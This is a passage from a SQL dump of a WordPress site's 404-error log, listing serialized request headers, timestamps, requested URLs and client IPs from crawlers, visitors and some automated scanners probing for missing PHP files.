Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631932466.5611419677734375;s:12:\"REQUEST_TIME\";i:1631932466;}}','notice','2021-09-18 02:34:28','2021-09-18 02:34:26',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'176.122.116.136'),(97190,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631933272.072720050811767578125;s:12:\"REQUEST_TIME\";i:1631933272;}}','notice','2021-09-18 02:47:53','2021-09-18 02:47:52',72168848,72256112,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97191,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631938109.4275710582733154296875;s:12:\"REQUEST_TIME\";i:1631938109;}}','notice','2021-09-18 04:08:31','2021-09-18 04:08:29',72623320,72707048,'http://zphiblgz.org/wordpress/media-admin.php',1,0,'195.78.67.32'),(97192,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943915.083611965179443359375;s:12:\"REQUEST_TIME\";i:1631943915;}}','notice','2021-09-18 05:45:17','2021-09-18 05:45:15',72604688,72688432,'http://zphiblgz.org/S-R/',1,0,'193.218.118.116'),(97193,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943923.523562908172607421875;s:12:\"REQUEST_TIME\";i:1631943923;}}','notice','2021-09-18 05:45:25','2021-09-18 05:45:23',72605864,72689712,'http://zphiblgz.org/s-r/',1,0,'185.31.175.252'),(97194,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943930.1437408924102783203125;s:12:\"REQUEST_TIME\";i:1631943930;}}','notice','2021-09-18 05:45:32','2021-09-18 05:45:30',72606200,72690072,'http://zphiblgz.org/replacedb2/',1,0,'185.31.175.252'),(97195,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943937.0439260005950927734375;s:12:\"REQUEST_TIME\";i:1631943937;}}','notice','2021-09-18 05:45:38','2021-09-18 05:45:37',72606200,72690072,'http://zphiblgz.org/replacebd/',1,0,'163.172.213.212'),(97196,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:137:\"Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631943943.1945450305938720703125;s:12:\"REQUEST_TIME\";i:1631943943;}}','notice','2021-09-18 05:45:45','2021-09-18 05:45:43',72606208,72690080,'http://zphiblgz.org/replace-db/',1,0,'163.172.213.212'),(97185,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631922583.11310100555419921875;s:12:\"REQUEST_TIME\";i:1631922583;}}','notice','2021-09-17 23:49:44','2021-09-17 23:49:43',72176608,72275904,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'207.46.13.142'),(97186,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631924568.0894539356231689453125;s:12:\"REQUEST_TIME\";i:1631924568;}}','notice','2021-09-18 00:22:49','2021-09-18 00:22:48',72162640,72245832,'https://zphiblgz.org/event/ladiez-real-talk-empowerment-summit/',1,0,'40.77.167.66'),(97184,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631921610.2725241184234619140625;s:12:\"REQUEST_TIME\";i:1631921610;}}','notice','2021-09-17 23:33:32','2021-09-17 23:33:30',72605416,72689152,'http://zphiblgz.org/scholarship/application/',1,0,'89.229.154.210'),(97183,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631921083.991302967071533203125;s:12:\"REQUEST_TIME\";i:1631921083;}}','notice','2021-09-17 23:24:46','2021-09-17 23:24:44',72149680,72236944,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97182,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631919760.2308199405670166015625;s:12:\"REQUEST_TIME\";i:1631919760;}}','notice','2021-09-17 23:02:42','2021-09-17 23:02:40',72242912,72327016,'http://zphiblgz.org/tag/%E7%82%8E%E3%81%AE%E6%96%AC%E3%82%8A%E3%81%A4%E3%81%91/',1,0,'66.249.65.165'),(97181,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631917176.2287139892578125;s:12:\"REQUEST_TIME\";i:1631917176;}}','notice','2021-09-17 22:19:38','2021-09-17 22:19:36',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.41'),(97180,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631916148.5381391048431396484375;s:12:\"REQUEST_TIME\";i:1631916148;}}','notice','2021-09-17 22:02:30','2021-09-17 22:02:28',72605384,72689152,'http://zphiblgz.org/application',1,0,'52.54.63.240'),(97179,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:22:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_ORIGIN\";s:19:\"http://zphiblgz.org\";s:12:\"HTTP_REFERER\";s:20:\"http://zphiblgz.org/\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"66\\\", \\\"Chromium\\\";v=\\\"66\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36\";s:8:\"HTTP_VIA\";s:26:\"1.0 localhost (squid/4.10)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"94.23.16.74\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631908401.56068897247314453125;s:12:\"REQUEST_TIME\";i:1631908401;}}','notice','2021-09-17 19:53:24','2021-09-17 19:53:21',72631792,72714888,'http://zphiblgz.org/scholarship/application/',1,0,'94.23.16.74'),(97178,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631905513.033812046051025390625;s:12:\"REQUEST_TIME\";i:1631905513;}}','notice','2021-09-17 19:05:15','2021-09-17 19:05:13',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.21'),(97177,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631904746.7164020538330078125;s:12:\"REQUEST_TIME\";i:1631904746;}}','notice','2021-09-17 18:52:28','2021-09-17 18:52:26',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'128.71.214.72'),(97176,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631901209.383060932159423828125;s:12:\"REQUEST_TIME\";i:1631901209;}}','notice','2021-09-17 17:53:31','2021-09-17 17:53:29',72690192,72791008,'https://zphiblgz.org/templates/protostar/error.php',1,0,'185.191.34.215'),(97175,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631899819.0631630420684814453125;s:12:\"REQUEST_TIME\";i:1631899819;}}','notice','2021-09-17 17:30:21','2021-09-17 17:30:19',72623360,72707096,'http://zphiblgz.org/wordpress/gank.php.PhP',1,0,'64.227.88.155'),(97174,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631899796.6183259487152099609375;s:12:\"REQUEST_TIME\";i:1631899796;}}','notice','2021-09-17 17:29:58','2021-09-17 17:29:56',72731792,72816416,'https://zphiblgz.org/content-post.php',1,0,'185.191.34.215'),(97173,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:21:\"http://simplesite.com\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631898443.721920013427734375;s:12:\"REQUEST_TIME\";i:1631898443;}}','notice','2021-09-17 17:07:25','2021-09-17 17:07:24',72604824,72688584,'http://zphiblgz.org/gank.php.PhP',1,0,'138.197.32.80'),(97172,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631896333.0931699275970458984375;s:12:\"REQUEST_TIME\";i:1631896333;}}','notice','2021-09-17 16:32:15','2021-09-17 16:32:13',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'85.26.235.67'),(97171,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 